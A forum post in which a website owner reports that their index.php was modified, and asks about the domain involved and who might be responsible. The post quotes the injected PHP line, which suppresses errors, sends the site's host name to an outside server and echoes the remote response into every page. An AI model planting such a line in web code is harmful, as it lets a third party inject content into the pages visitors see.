subster
Elite Member
- Apr 5, 2008
- 2,157
- 1,608
Hi,
one of my websites index.php got infiltrated. There was no server hack, but the file was modified. I only recognized it because the site has slowed down dramatically. I looked for the reason and found out that it tries to establish a connection to 68.169.39.52, which is none of my servers. So i searched through the files and found this line of code:
The website is down. Does anyone know netanalytic.com? Could not find anything but stat-pages (those we use to index our sites
)
Seems like an attack from a competitor or?
one of my websites index.php got infiltrated. There was no server hack, but the file was modified. I only recognized it because the site has slowed down dramatically. I looked for the reason and found out that it tries to establish a connection to 68.169.39.52, which is none of my servers. So i searched through the files and found this line of code:
Code:
<?php error_reporting(0); echo @file_get_contents("http://netanalytic.com/linkadmin/tracker/tracker.php?h=".$_SERVER['HTTP_HOST']."&id=33"); ?>
The website is down. Does anyone know netanalytic.com? Could not find anything but stat-pages (those we use to index our sites
Seems like an attack from a competitor or?